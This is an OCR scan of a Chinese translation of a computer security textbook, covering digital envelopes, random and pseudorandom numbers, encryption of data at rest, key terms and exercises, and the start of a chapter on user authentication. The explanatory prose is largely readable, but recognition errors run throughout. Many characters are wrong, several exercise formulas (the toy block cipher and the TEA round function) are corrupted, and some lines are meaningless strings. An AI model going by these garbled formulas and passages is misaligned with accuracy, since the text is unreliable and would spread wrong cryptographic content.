们 如 何 来 完成 这 个 工作 呢 ? 如 果 Alice 就 在 Bob WME, IRA Bob 可 以 生成 一 个 密 铀 ， 把 
它 写 在 纸 上 或 者 存储 在 软盘 上 ， 然 后 把 它 交 给 Alice; 但 是 ， 如 果 Alice 位 于 大 陆 或 世界 的 
另 一 侧 ，Bob 该 怎么 做 呢 ? 他 可 以 利用 对 称 加 密 来 加 密 该 密 钥 ， 然 后 通过 电子 邮件 将 其 发 送 
给 Alice， 但 这 意味 着 Bob 和 Alice 必须 共享 一 个 秘密 密 钥 来 加 密 这 个 新 的 秘密 密 钥 。 而 且 ， 
Bob 和 其 他 所 有 使 用 新 的 邮件 包 的 人 面临 一 个 相同 的 问题 : 每 对 通信 者 必须 共享 一 个 唯一 的 
秘密 密 铂 。 

一 种 方法 是 使 用 Diffie-Hellman 密 钥 交换 。 该 方法 事实 上 已 经 被 广泛 使 用 了 。 但 是 它 有 
一 个 缺陷 ， 就 是 它 的 形式 过 于 简单 ，Diffe-Hellman 没有 提供 两 个 通信 者 之 间 的 认证 。 有 许 
多 Diffie-Hellman 的 变种 克服 了 这 个 问题 。 而 且 ， 基 于 其 他 公 钥 算法 的 协议 也 能 达到 相同 的 
目的 。 


244 ”数字 信封 


公 钥 加 密 中 另 一 个 用 来 保护 对 称 密 钥 的 应 用 是 数字 信封 ， 数 字 信 封 可 以 用 来 保护 消息 而 不 
必 事 先 让 发 送 方 和 接收 方 具 有 相同 的 密 钥 。 这 项 技术 被 称 为 数字 信封 ， 它 相当 于 装着 未 签名 信 
件 的 密封 信封 。 图 2-9 描述 了 这 种 技术 。 假 设 Bob 想 要 发 一 个 机 密 的 消息 给 Alice， 但 是 他 们 
并 没有 共享 一 个 对 称 的 密 钥 ， 那 么 Bob 将 做 以 下 事情 : 

1. 准备 要 发 送 的 消息 。 

2. 产生 一 个 随机 的 对 称 密 钥 ， 该 密 钥 只 会 用 到 一 次 。 

3. 利用 一 次 性 密 钥 对 消息 进行 对 称 加 密 。 

4. 利用 Alice 的 公 钥 对 一 次 性 密 钥 进行 公 钥 加 密 。 

5. 将 加 密 的 一 次 性 密 钥 和 加 密 的 消息 连 在 一 起 发 送 给 Alices 

只 有 Alice 可 以 对 一 次 性 密 钥 进行 解密 ， 从 而 还 原 出 原始 的 消息 。 如 果 Bob 通过 Alice 的 
公 钥 证 书 获得 了 Alice 的 公 钥 ， 那 么 Bob 就 能 确信 它 是 一 个 有 效 的 密 钥 。 
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经 过 加 密 
的 对 称 密 钥 


a) 创建 数字 信封 


的 对 称 密 钥 下 一 的 私 钥 
b) 打开 数字 信封 


图 2-9 数字 信封 


2.5 ”随机 数 和 伪 随 机 数 


随机 数 在 许多 网 络 安全 应 用 中 扮演 着 重要 的 角色 。 本 节 中 ， 我 们 对 它 进行 概括 的 介绍 。 附 
K D 中 给 出 了 详细 的 说 明 。 


2.5.1 随机 数 的 使 用 


大 量 基于 密码 学 的 网 络 安全 算法 使 用 了 随机 数 ， 例 如 : 
e RSA 公 钥 加 密 算法 (在 第 21 章 中 介绍 ) 和 其 他 公 钥 算法 中 密 钥 的 产生 。 
对 称 流 密码 中 流 密 钥 的 生成 。 
用 作 临 时 会 话 密 钥 或 者 产生 数字 信封 的 对 称 密 钥 的 生成 。 
在 许多 密 钥 分 发 环境 如 Kerberos 域 (在 第 23 章 中 讲述 ) 中 ， 随 机 数 作为 握手 信号 以 防 
止 重 放 攻 击 。 

e 会 话 密 钥 的 生成 ， 无 论 其 是 由 密 钥 分 发 中 心 完成 还 是 由 一 个 本 体 (principal) 完成 。 

这 些 应 用 对 随机 数 序列 提出 了 两 种 截然 不 同上 且 不 一 定 兼 容 的 要 求 : 随机 性 和 不 可 预测 性 。 

随机 性 ”传统 上 ， 对 产生 所 谓 的 随机 数 序列 的 关注 一 直 在 于 数列 的 随机 性 是 否 具 有 良好 的 
统计 性 质 。 下 面 是 两 个 用 来 验证 序列 随机 性 的 准则 : 

e 均匀 分 布 (uniform distribution) : 序列 中 随机 数 的 分 布 应 是 均匀 的 ， 即 每 个 数 的 出 现 频 

率 应 当 大 致 相等 。 

e 独立 性 (independence); 序列 中 任何 数 不 能 由 其 他 数 推导 出 来 。 

尽管 有 许多 测试 方法 可 以 用 来 确定 一 个 序列 是 否 服 从 某 个 分 布 (如 均匀 分 布 )， 但 还 没有 
某 种 测试 方法 可 以 “证 明 ” 独 立 性 ,确切 地 说 ， 某 些 测 试 方法 仅 可 以 用 于 判断 一 个 序列 不 具有 
独立 性 。 通 常 的 策略 是 多 进行 一 些 测 试 ， 直 至 认为 它 的 独立 性 足够 强 。 

在 我 们 的 讨论 中 ， 在 设计 与 密码 学 相关 的 算法 时 经 常 使 用 看 起 来 统计 随机 的 数列 。 例 如 ， 
RSA 公 钥 加 密 方 案 的 一 个 基本 要 求 就 是 产生 素数 的 能 力 。 一 般 来 说 ， 判 断 一 个 给 定 的 大 数 和 N 
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是 否 为 素数 是 很 难 的 。 采 用 蛮 力 测试 的 方法 需要 把 和 N 除 以 /N 以 内 的 数 ， 如 果 NN 是 10! 这 种 数 
量 级 的 (这 种 大 数 在 公 钥 密码 中 并 非 罕见 )， 那 么 用 蛮 力 来 测试 它 是 否 为 素数 则 超出 了 人 和 计 
算 机 的 实际 计算 能 力 。 然 而 ， 有 许多 有 效 的 算法 可 使 用 随机 选择 的 整数 序列 作为 相对 简单 的 计 
算 的 输入 来 测试 一 个 大 数 是 否 为 素数 。 只 要 序列 足够 长 (但 是 远 比 Vi0'” 要 少 )， 就 几乎 可 判 
定 这 个 大 数 是 否 为 素数 。 这 类 方法 称 为 不 确定 性 方法 ， 它 在 算法 设计 中 经 常 被 用 到 。 从 本 质 上 
说 ， 若 某 问题 的 精确 求解 很 难 或 很 耗 时 ， 则 可 以 采用 简单 的 、 所 谓 不 确定 的 方法 来 取得 具有 革 
种 可 信 度 的 解 。 

不 可 预测 性 ”在 相互 认证 或 会 话 密 钥 生成 之 类 的 应 用 中 ， 对 数列 的 统计 随机 性 的 要 求 并 不 
是 很 高 ， 但 是 要 求 产 生 的 随机 数 序列 是 不 可 预测 的 。 所 谓 的 “ 真 ” 随 机 数 序列 ， 是 各 个 数 之 间 
的 统计 独立 性 而 使 序列 不 可 预测 。 不 过 ， 真 正 的 随机 数 序列 很 少 用 到 ， 一 般 的 随机 数 序列 是 由 
算法 产生 的 ， 只 要 敌手 不 能 从 前 面 的 随机 数 推导 出 后 面 的 随机 数 就 可 以 了 。 


2.5.2 ”随机 与 伪 随 机 


密码 应 用 大 多 使 用 算法 来 生成 随机 数 。 这 些 算法 是 确定 的 ， 所 以 产生 的 序列 并 非 是 统计 随 
机 的 。 不 过 要 是 算法 好 的 话 ， 产生 的 序列 可 以 经 受 住 随机 性 检测 。 这 样 的 数 一 般 被 称 为 伪 随 机 
#1 (pseudorandom number), 

你 也 许 对 这 种 算法 持 怀 疑 态度 ， 但 是 ， 只 要 我 们 不 追求 哲学 上 的 完美 性 ， 这 种 方法 的 确 有 
效 。 也 就 是 说 ， 在 大 多 情况 下 ， 伪 随机 数 在 实际 应 用 中 会 表现 得 像 真 随机 数 一 样 。 尽 管 “ 像 真 
随机 数 一 样 ” 这 种 说 法 是 非常 主观 的 ， 然 而 伪 随 机 数 已 被 普遍 接受 。 类 似 思想 在 统计 应 用 中 也 
有 所 体现 ,例如 统计 员 通 过 一 个 人 口 样本 的 分 布 可 以 大 致 估计 出 人 口 的 总 体 分 布 。 

一 个 真 随机 数 发 生 器 (True Random Number Generator, TRNG) 是 利用 不 确定 的 源 来 生成 
随机 数 。 大 部 分 是 通过 测量 不 可 预测 的 自然 过 程 (如 电离 辐射 效应 的 脉冲 检测 器 、 气 体 放电 
管 和 漏电 电容 器 ) 来 实现 的 。Intel 公司 开发 了 一 个 商用 忌 片 ， 其 通过 增 大 无 驱动 电阻 右 的 电 
压 来 对 热 噪 声 进行 采样 [JUN99]。LavaRnd 是 一 个 利用 廉价 的 上 照相机、 开源 代码 和 廉价 的 硬件 
产生 真 随机 数 的 开源 项 目 。 该 系统 采用 不 透 光 的 饱和 电荷 看 合 器 件 (CCD) 作为 混沌 源 来 产生 
种 子 。 软 件 将 结果 处 理 成 多 种 格式 的 真 随机 数 。 第 一 个 商用 的 且 具 有 一 定 产量 的 TRNG 是 于 
2012 年 5 月 上 市 的 Intel 数字 随机 数 发 生 需 (Digital Random Number Generator, DRNG), CÈ 
于 新 的 多 核 世 片上 。 


2.6 ”实际 应 用 : 存储 数据 的 加 密 


计算 机 系统 的 一 条 基本 安全 要 求 是 保护 存储 的 数据 。 对 存储 数据 进行 保护 的 安全 机 制 包括 
访问 控制 、 入 侵 检 测 和 入侵 保护 策略 ， 这 些 在 本 书 中 均 会 介绍 。 本 书 还 介绍 了 许多 可 以 令 这 些 
安全 机 制 变 得 脆弱 的 技术 手段 。 但 是 除了 技术 方面 的 因素 ， 一些 人 为 因素 也 可 以 使 这 些 方法 变 
得 脆弱 。 这 里 根据 文献 [ROTH05] 列举 出 一 些 例子 。 
e 2004 年 12 月 , 美国 银行 的 职员 将 包含 注册 到 一 个 签 账 卡 的 120 万 政府 工作 人 员 的 名 
字 、 地 址 、 银 行 账号 和 社会 保险 号 等 信息 的 数据 备份 到 磁带 ， 并 送 往 数据 备份 中 心 。 
所 有 数据 都 没有 加 密 。 然 而 ， 这 些 磁带 并 没有 被 送 到 ， 事 实 上 它们 永远 不 会 被 找到 了 。 
遗憾 的 是 ， 这 种 备份 和 运送 数据 的 方法 太 过 平常 了 。 再 举 一 个 例子 ，2005 年 4 月 ， 
Ameritrade 虽 指 责 其 运 货 商 丢失 了 包含 200 000 名 客户 的 未 加 密 信息 的 备份 磁带 。 
e 2005 年 4 月 ，San Jose 医疗 机 构 宣称 有 人 通过 物理 途径 偷 走 了 它们 的 一 台 计 算 机 并 可 


日 ”美国 五 大 在 线 证 券 交 易 公 司 之 一 。 一 一 译 者 注 
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能 获得 185 000 条 未 加 密 的 病人 记录 。 

e 便携 电脑 丢失 的 例子 不 计 其 数 : 在 机 场 丢 失 ， 在 停放 着 的 汽车 中 被 盗 ， 在 用 户 离开 办 公 
旧时 被 拿 走 。 如 果 存 储 在 这 些 便携 电脑 硬盘 上 的 数据 未 加 密 ， 则 所 有 的 数据 都 将 被 究 贼 
获得 。 

尽管 现在 商业 上 已 经 对 通过 网 络 Internet 或 无 线 设 备 传输 的 信息 提供 了 包括 加 密 在 内 的 
各 种 保护 手段 ， 可 一 旦 数据 存储 在 本 地 ( 称 为 静态 数据 (data at rest) )， 就 很 少 有 域 认 证 和 操作 
系统 访问 控制 之 外 的 保护 了 。 静 态 数据 通常 备份 在 辅助 存储 如 如 光学 介质 、 人 磁 市 或 移动 硬盘 
中 ， 可 以 无 限期 地 保存 。 而 且 ， 即 使 数据 从 硬盘 中 删除 了 ， 直 到 有 关 的 磁盘 扇 区 被 再 次 使 用 之 
前 ， 这 些 数据 都 可 以 被 恢复 回来 。 因 此 ， 对 静态 数据 加 密 并 结合 有 效 的 加 密 密 钥 管理 体制 的 方 
案 变 得 颇具 吸引 力 ， 实 际 上 应 该 强制 执行 。 

有 许多 方法 可 以 用 来 进行 加 密 。 一 种 应 用 于 便携 电脑 的 简单 方法 是 利用 一 个 商用 的 加 密 
包 ， 如 良好 隐私 (Pretty Good Privacy, PGP). PGP 可 以 使 用 户 通 过 口令 来 产生 密 钥 ， 然 后 利 
用 这 个 密 钥 加 密 从 硬盘 中 选择 的 文件 。PGP 包 并 不 存储 这 个 口令 。 要 恢复 一 个 文件 ， 需 要 先 由 
用 户 输入 口令 ，PGP 生成 密 钥 ， 然 后 对 文件 解密 。 只 要 用 户 保护 好 他 的 口令 ， 并 且 不 使 用 容易 
猜测 的 口令 ， 静态 文件 就 能 受到 完全 的 保护 。[COLL06] 中 列举 了 一 些 最 近 使 用 的 方法 : 

e 后 端 器 件 (back-end appliance): 这 是 一 个 位 于 服务 器 和 存储 系统 之 间 的 硬件 设备 ， 它 

对 所 有 从 服务 器 传输 到 存储 系统 的 数据 进行 加 密 ， 并 对 在 相反 方向 上 传输 的 数据 进行 
解密 。 这 些 设备 以 接近 线 速 ( wire speed) 的 速度 加 密 数 据 ， 并 且 具 有 很 小 的 延 返 。 相 
比 之 下 ， 服 务 器 和 存储 系统 上 的 加 密 软 件 则 减 慢 了 备份 。 系 统管 理 员 可 以 配置 该 硕 件 
以 接受 来 自 特 定 用 户 的 请 求 ， 为 他 们 提供 未 加 密 的 数据 。 

e 基于 库 的 磁带 加 密 (library-based tape encryption) : iit ie A Fl) ari SK oh i FRETT JAE nE 
件 的 协 处 理 器 电路 板 提供 加 密 。 这 个 协 处 理 顺 利用 配置 到 电路 板 上 的 不 可 读 的 密 钥 加 
密 数 据 。 然 后 将 磁带 发 送 到 具有 相同 磁带 驱动 需 便 件 的 场所 。 密 铀 可 以 通过 安全 电子 
邮件 或 者 很 小 的 闪存 盘 安 全 传输 。 如 果 其 他 地 点 的 磁带 驱动 需 硬 件 中 的 协 处 理 硕 不 可 
用 ， 目 标 机 构 可 以 利用 软件 解密 包 中 的 密 铀 来 恢复 数据 。 
便携 电脑 和 PC 后 台数 据 加 密 ( background laptop and PC data encryption) : 大 量 生产 软 
件 产品 的 厂商 所 提供 的 加 密 功 能 对 应 用 和 用 户 是 透明 的 。 一 些 产 品 可 以 对 所 有 的 或 指 
定 的 文件 和 文件 夹 进行 加 密 。 男 外 一 些 产品 (如 Windows 的 驱动 器 加 密 和 Mac 系统 的 
文件 保险 箱 ) 则 需 创 建 一 个 虚拟 盘 ， 该 虚拟 盘 可 以 通过 本 地 用 户 的 硬盘 或 网 络 存储 设 
备 来 维护 ， 虚 拟 盘 中 的 所 有 数据 都 进行 了 加 密 。 不 同 的 密 钥 管理 方案 可 用 来 限制 对 数 
据 载体 的 访问 。 


2.7 关键 术语 、 复 习题 和 习题 


关键 术语 

Advanced Encryption Standard (AES， 高 级 加 密 标准 ) cryptanalysis (密码 分 析 ) 

asymmetric encryption ( 非 对 称 加 密 ) Data Encryption Standard (DES， 数 据 加 密 标准 ) 
authentication (认证 ) data integrity (数据 完整 性 ) 

brute-force attack ( 蛮 力 攻击 ) decryption (解密 ) 

ciphertext (X) Diffie-Hellman key exchange ( Diffie-Hellman #444 
collision resistant ( 抗 碰撞 ) 交换 ) 


confidentiality (机 密 性 ) digital signature (数字 签名 ) 
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Digital Signature Standard (DSS， 数 字 签 名 标准 ) 
elliptic curve cryptography (椭圆 曲线 密码 学 ) 
encryption (加 密 ) 

hash function (PJI pa RX) 

keystream ( 密 钥 流 ) 

message authentication (消息 认证 ) 

Message Authentication Code (MAC， 消 息 认 证 码 ) 
modes of operation (操作 模式 ) 

one-way hash function ( 单 向 散 列 函数 ) 
plaintext (明文 ) 

preimage resistant (抗原 象 ) 

private key ( 私 钥 ) 

pseudorandom mumber( 伪 随机 数 ) 


复习 题 
2.1 ”对称 密 码 的 基本 要 素 是 什么 ? 


2.2 ”用 对 称 密码 进行 通信 的 两 个 人 需要 多 少 个 密 钥 ? 


23 ”安全 使 用 对 称 加 密 的 两 个 基本 要 求 是 什么 ? 
2.4 列 出 三 种 消息 认证 的 实现 方法 。 

2.5 什么 是 消息 认证 码 ? 

2.6 简要 描述 图 2-3 中 展示 的 三 种 方案 。 


public key (2$44) 

public-key certificate ( 公 钥 证 书 ) 
public-key encryption ( 公 钥 加 密 ) 
random mumber (随机 数 ) 

RSA (RSA 算法 ) 

second preimage resistant (第 二 抗原 象 ) 
secret key (秘密 密 钥 ) 

Secure Hash Algorithm (SHA， 安 全 散 列 算法 ) 
secure hash function (安全 散 列 函数 ) 
strong collision resistant ( 强 抗 碰撞 ) 
symmetric encryption (对 称 加 密 ) 

triple DES (三 重 DES ) 

weak collision resistant (能 抗 碰撞 ) 


2.7 ”对 于 消息 认证 有 用 的 散 列 函数 必须 具有 什么 性 质 ? 


2.8 公 钥 密码 体制 的 主要 要 素 是 什么 ? 


2.9 列 出 并 简要 定义 一 下 公 钥 密码 体制 的 三 种 应 用 。 


2.10” 私 钥 和 秘密 密 钥 的 区 别 是 什么 ? 

2.11 什么 是 数字 签名 ? 

2.12 ”什么 是 公 钥 证 书 ? 

2.13 ”怎样 利用 公 钥 加 密实 现 秘 密 密 钥 的 分 发 ? 


习题 


2.1 假定 某 人 建议 用 如 下 方法 来 确认 你 们 两 个 人 是 否 拥 有 同一 密 钥 。 你 创建 了 一 个 与 密 钥 长 度 相 
等 的 随机 比特 串 ， 将 它 和 密 钥 进行 异 或 ， 并 通过 通道 发 送 结果 。 你 的 伙伴 将 得 到 的 分 组 与 密 
钥 (应 该 和 你 的 密 钥 相同 ) 进行 异 或 并 发 回 它 。 你 进行 核对 ， 如 果 你 接收 到 的 是 你 的 原始 随机 
串 ， 你 就 证 实 了 你 的 伙伴 拥有 同一 密 钥 ， 而 你 们 两 个 人 都 还 没有 传递 过 密 钥 。 这 个 方案 有 缺 


陷 吗 ? 


2.2 ”这 个 问题 是 现实 世界 中 一 个 对 称 密码 的 例子 ， 它 来 自 以 前 美国 的 特种 部 队 手 册 (公开 的 部 分 )。 这 个 


文件 的 文件 名 为 Special Forces.pdf， 可 以 在 box.com/CompSec4e 网 站 上 获得 。 
a. 利用 两 个 密 钥 (AFF) cryptographic 和 network security， 加 密 下 面 的 文字 : 


Be at the third pillar from the left outside the lyceum theatre tonight at seven. If you are distrustful bring 


two friends. 


EP EEA EAE HP CA EA a A BAD E A As ES ET E. H 


你 的 假设 是 什么 。 


注 : 本 条 消息 来 源 于 福尔摩斯 小 说 《 The Sign of Four 》。 
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b. 对 密 文 进行 解密 ， 并 给 出 解密 结果 。 

c. 讨论 在 什么 时 候 适 合 采用 这 项 技术 ， 以 及 它 的 优点 是 什么 。 

考虑 一 个 非常 简单 的 对 称 分 组 加 密 算法 ， 利 用 一 个 128 位 的 密 钥 对 64 位 明文 分 组 进行 加 密 。 加 密 

过 程 定义 如 下 : 

C=(PO@ Ko) HK: 

这 里 C=; K= AAA; Ko 二 K 的 最 左边 的 64 位 ; KEK 的 最 右边 的 64 位 ， 旬 = 二 按 位 异 或 操 

作 ; B= 2” 加 法 运算 。 

a. 写 出 解密 方程 ， 也 就 是 将 P RRA C. Ki A K 的 函数 。 

b. 假设 攻击 者 已 经 获得 了 两 套 明文 和 对 应 的 密 文 并 希望 确定 密 钥 K， 有 两 个 方程 

C=(P@K)HK; C =(P'@ Ko) HK 

首先 推导 出 只 含 一 个 未 知 量 (如 Ko) 的 方程 。 是 否 可 以 进一步 求 出 Ko? 

或 许 最 简单 的 “标准 ”对 称 分 组 加 密 算法 是 Tiny 加 密 算法 (TEA). TEA 使 用 一 个 128 位 的 密 钥 对 

64 位 的 明文 分 组 进行 运算 。 明 文 被 分 成 两 个 32 位 的 分 组 (L。，Ro )， 密 钥 被 分 成 4 个 32 位 的 分 组 

(Ko。，K!，K;,，K; )。 加 密 涉 及 两 轮 的 重复 应 用 ， 定 义 第 i 轮 和 第 i+] 轮 运算 如 下 : 

Emi 
EIE F(Ri-1, Ko, Ki, 6) 
Li+!=R, 
a 

这 里 下 定义 如 下 : 

F(M, Ki, Kx, 6))=((M<4) H K) © (M>5) H Kx) ® (M+ ô) 

其 中 ， 对 x SAE ”位 表示 为 x<y; 对 x 人 逻辑 右 移 y 位 表示 为 >y; 6 是 一 个 预定 义 的 常量 序列 。 

a. 评价 使 用 常量 序列 的 重要 性 和 优点 。 

b. 利用 框图 或 流程 图 描述 TEA 的 运算 过 程 。 

c. 假设 只 进行 了 两 轮 ， 密 文 由 64 位 分 组 (Lo, R) 组 成 。 在 这 种 情况 下 ， 写 出 解密 算法 的 方程 。 

d. 采用 类 似 (b) 部 分 所 用 的 方法 再 次 完成 (c) 部 分 。 

这 里 我 们 比较 一 下 由 数字 签名 (DS) 和 消息 认证 码 (MAC) 提供 的 安全 服务 。 假 定 Oscar 可 以 看 到 

Alice 发 给 Bob 的 所 有 信息 ， 也 可 以 看 到 Bob 发 给 Alice 的 所 有 消息 。 对 于 数字 签名 ，Oscar 除了 公 

钥 之 外 不 知道 其 他 任何 密 钥 。 解 释 : DS 和 MAC 是 否 能 防御 下 面 各 种 攻击 以 及 如 何 防御 。auth(x) 

的 值 分 别 用 DS 和 MAC 算法 计算 。 

a. (消息 完整 性 ) Alice 将 消息 x 二 “将 1000 美元 转账 给 Mark” 以 明文 的 形式 发 送 给 Bob， 并 连同 
auth(x) 一 起 发 给 Bob. Oscar 中 途 截获 了 该 消息 并 用 “ Oscar” 替换 “Mark”。 那 么 Bob 可 以 检 
测 出 来 吗 ? 

b. ( 重 放 ) Alice 将 消息 x= “HF 1000 美元 转账 给 Oscar” 以 明文 的 形式 发 送 给 Bob， 并 连同 auth) 
一 起 发 给 Bob, Oscar 观察 到 了 该 消息 和 签名 ， 并 将 其 发 送 给 Bob 100 次 。 那 么 Bob 可 以 检测 出 
来 吗 ? 

c. (欺骗 第 三 方 的 发 送 方 认证 ) Oscar 声称 他 将 消息 x 连同 有 效 的 auth(x) 发 送 给 了 Bob。 而 Alice 却 
说 是 她 发 的 。 那 么 Bob 可 以 区 分 出 是 谁 发 的 吗 ? 

d. ( Bob 欺骗 认证 ) Bob 声称 他 从 Alice 那里 收 到 了 x 消息 和 有 效 的 签名 auth(x) (如 “将 1000 美元 
从 Alice 那里 转账 到 Bob” ), (BÆ Alice 说 她 没 发 过 这 样 的 消息 。 那 么 Alice 能 解释 清楚 这 个 问 
题 吗 ? 

假设 H(m) 是 一 个 抗 碰撞 散 列 函 数 ， 该 散 列 函数 将 任意 长 度 的 消息 映射 成 4 位 的 散 列 值 。 那 么 对 于 

所 有 的 消息 x、x'， 且 x 关 x'"，H(x) 取 Hlx') 是 正确 的 吗 ? 说 出 你 的 理由 。 

本 题 介 绍 一 种 在 思想 上 类 似 于 SHA 的 散 列 函数 ， 它 对 字母 而 不 是 二 进 制 数据 进行 运算 ， 其 被 称 为 
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玩具 四 字母 散 列 (toy tetragraph hash, tth) 呈 。 给 定 一 个 由 字母 序列 组 成 的 消息 ，tth 产生 由 四 个 字 
母 组 成 的 散 列 值 。 首 先 ，tth 把 消息 分 成 16 个 字母 长 的 分 组 ， 并 且 名 略 空格 、 标 点 符号 和 大 写 。 如 
果 消 息 长 度 不 能 被 16 整除 ， 则 用 空 值 (null) 填充 。 维 护 由 四 个 数字 组 成 的 累加 值 (running total), 
其 初 值 为 (0,0,0,0); 将 其 输入 一 个 函数 ( 称 为 压缩 函数 )， 用 来 处 理 第 一 个 分 组 。 压 缩 函 数 由 两 轮 
构成 。 第 一 轮 : 取出 一 个 分 组 ， 按 行 排列 成 4X4 的 方 阵 形 式 ， 然 后 将 它 转换 成 数字 (A=0, B=1, 
等 等 )。 例 如 ， 对 于 分 组 ABCDEFGHIJKLMNOP， 我 们 有 : 





然后 将 每 一 列 模 26 相 加 ， 再 把 所 得 的 结果 模 26 加 至 累加 值 。 对 于 本 例 ， 累 加 值 是 ( 24, 2, 6, 
)。 第 二 轮 : 使 用 第 一 轮 运 算得 到 的 矩阵， 第 一 行 循环 左 移 1 个 位 置 ， 第 二 行 循环 左 移 2 个 位 置 ， 
三 行 循 环 左 移 3 个 位 置 ， 第 四 行 的 顺序 完全 颠倒 。 在 我 们 的 例子 中 为 
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这 时 我 们 对 每 一 列 模 26 相 加 ， 再 将 结果 加 至 累加 值 ， 新 的 累加 值 是 (5, 7, 9, 11 )。 现 在 的 累加 
值 作 为 下 一 个 分 组 的 压缩 函数 的 第 一 轮 输 入 。 最 后 一 个 分 组 处 理 完毕 后 ， 再 把 最 终 的 累加 值 转换 为 
字母 。 例 如 ， 如 果 消 息 是 ZBCDEFGHIJKLMNOP， 那 么 散 列 值 为 FHIL. 
a. 画图 说 明 完 整 的 tth 逻辑 和 压缩 函数 逻辑 。 
b. 对 于 48 个 字母 的 消息 “I leave twenty million dollars to my friendly cousin Bill”， 计 算出 它 的 散 

列 值 。 
c. 说 明 tth 的 弱点 ， 找 出 产生 与 刚才 相同 的 散 列 值 的 48 个 字母 组 成 的 分 组 。 提 示 : 利用 大 量 的 A 。 
在 任何 诸如 RSA 的 公 钥 体制 出 现 之 前 ， 就 已 经 有 了 关于 公 钥 体制 存在 性 的 证 明 ， 其 目的 是 说 明 公 
HEE EEIT SR RMA y=, A. y) =z, ACs, y) =z, HP MME 
HM, Al<x, yi, SNo AMA TUAKA N 的 矢量 M 表示 ， 其 中 M KE kame 
fil) ; FW, AS AT SP SA NXN ERE M2 和 M3 表示 。 这 样 表示 的 目的 是 希望 通过 查 入 值 
很 大 的 表 来 实现 加 密 /解密 过 程 。 这 样 的 表 太 大 ， 实 践 中 不 可 行 , 但 理论 上 是 可 以 构造 的 。 该 方 
案 的 工作 过 程 如 下 : 首先 ， 构造 M1 为 1 到 NN 之 间 的 所 有 整数 的 一 个 随机 排列 ， 即 每 个 整数 在 
M1 中 恰好 出 现 一 次 。 构 造 M2， 使 其 每 行 都 是 前 N 个 整数 的 一 个 随机 排列 ; 最 后 按 下 述 条 件 
生成 M3: 
AOK, p) DS=p, HMA k, pH 1<k, p<N 

也 就 是 说 : 
1. M1 的 输入 为 k， 输 出 为 x。 
2. M2 的 输入 为 x 和 p， 输 出 为 z。 
3. M3 的 输入 为 > 和 大， 输出 为 p。 
构造 好 三 张 表 之 后 ， 将 其 对 外 公开 。 


日 ”感谢 美国 密 电 码 协会 和 William K. Mason 提供 了 本 例 。 
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a 显然 ， 可 以 构造 出 满足 以 上 条 件 的 M3。 作为 一 个 例子 ， 请 对 于 下 面 的 简单 情况 将 M3 填写 完整 : 
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约定 : M1 的 第 i 个 分 量 对 应 上 =i ; M2 的 第 i 行 对 应 x 二 i，M2 的 第 j 列 对 应 p= 二 j ; M3 的 第 i 行 
对 应 z=i, M3 的 第 j 列 对 应 ==j。 可 以 用 另 一 种 方式 来 看 这 个 问题 ,M1 的 第 i 行 对 应 M3 的 第 i 列 ， 
第 i 行 的 分 量 值 选 出 M2 的 一 行 。M3 的 选 定 列 的 分 量 来 自 M2 的 选 定 行 的 分 量 。M2 的 选 定 行 中 
的 第 一 个 分 量 指出 值 “1” 在 M3 的 选 定 列 中 的 位 置 。M2 的 选 定 行 中 的 第 二 个 分 量 指 出 值 “2” 
在 M3 的 选 定 列 中 的 位 置 ， 依 此 类 推 。 

b. 说 明 如 何 使 用 上 述 各 表 在 两 个 用 户 间 实 现 加 密 和 解密 。 

c. 证 明 这 是 一 种 安全 的 方案 。 

2.9 构造 一 张 与 图 2-9 类 似 的 图 ， 其 中 包括 对 数字 信封 中 的 消息 进行 认证 的 数字 签名 。 
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第 3 章 | 


Computer Security: Principles and Practice, 4th Edition 


用 户 认 证 





学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
讨论 用 户 身份 认证 的 四 种 一 般 方法 ; 
解释 基于 散 列 口令 的 用 户 认证 的 机 制 ; 


理解 Bloom 过 滤器 在 口令 管理 中 的 作用 |; 
概述 基于 令 牌 的 用 户 认证 ; 

讨论 远程 用 户 认 证 所 涉及 的 问题 与 解决 方法 ; 
概述 用 户 认 证 中 的 密 钥 安全 问题 。 





在 大 多 数 计算 机 安全 环境 中 ,用 户 认证 在 安全 防范 体系 中 是 最 基本 的 组 成 部 分 ， 也 是 防范 
和信 侵 的 主要 防线 。 用 户 认 证 还 是 大 多 数 访问 控制 策略 以 及 追究 用 户 责任 的 基础 。 用 户 认 证 包括 
两 个 功能 : 第 一 ， 用 户 通过 呈现 一 个 凭证 (例如 用 户 ID ) 来 识别 自身 以 登录 系统 ; 第 二 ， 系 统 
通过 交换 认证 信息 来 核实 用 户 身份 。 

例如 ， 用 户 Alice Toklas 拥有 用 户 ID ABTOKLAS。 该 信息 应 该 存储 在 Alice 想 要 使 用 的 
任何 服务 器 或 计算 机 系统 中 ， 并 对 系统 管理 员 及 其 他 用 户 是 已 知 的 。 认 证 信息 中 ， 一 般 与 用 
户 ID 联系 在 一 起 的 数据 项 是 口令 ， 口 令 是 机 密 信 息 ( 仅 对 Alice 和 系统 可 知 ) 8。 如 果 没 有 
人 能 够 得 到 或 猜 到 Alice 的 口令 ， 那 么 系统 管理 员 就 可 以 利用 Alice 的 用 户 ID 与 口令 的 组 
合 ， 建 立 Alice 的 访问 权限 并 审计 她 的 活动 。 由 于 Alice 的 用 户 ID 不 保密 ， 系 统 中 的 所 有 用 
户 都 可 以 向 Alice 发 送 电子 邮件 ， 但 是 Alice 的 口令 却 是 保密 的 ， 这 就 保证 别人 不 能 伪装 
成 Alice。 

从 本 质 上 讲 ， 身份 识别 就 是 用 户 向 系统 声称 其 身份 的 方法 ; 用 户 认证 则 是 建立 该 声称 的 有 
效 性 的 方法 。 值 得 注意 的 是 ， 用 户 认 证 不 同 于 消息 认证 。 第 2 章 已 定义 ， 消 息 认证 是 通信 各 方 
验证 所 接收 的 消息 没有 被 更 改 且 消息 源 真实 的 过 程 。 本 章 仅 关注 用 户 认证 。 

本 章 首 先 对 不 同 的 用 户 认 证 方法 进行 综述 ， 然 后 详细 地 分 析 每 种 认证 方法 。 


3.1 数字 用 户 认 证 方法 


NIST SP 800-63-3 (数字 认证 指南 ，2016 年 10 月 ) 给 出 了 数字 用 户 认 证 的 定义 : 信息 系 
统 对 用 户 电 子 式 地 提交 的 身份 建立 信任 的 过 程 。 系 统 可 以 通过 认证 个 体 的 身份 而 决定 该 个 体 
是 否 已 被 授权 从 而 可 使 用 系统 所 提供 的 某 种 功能 ， 例 如 处 理 数据 库 事务 或 访问 系统 资源 。 大 
多 数 情况 下 ， 认 证、 事务 或 其 他 授权 功能 通常 在 类 似 Internet 的 开放 网 络 中 运行 。 同 样 ， 认 
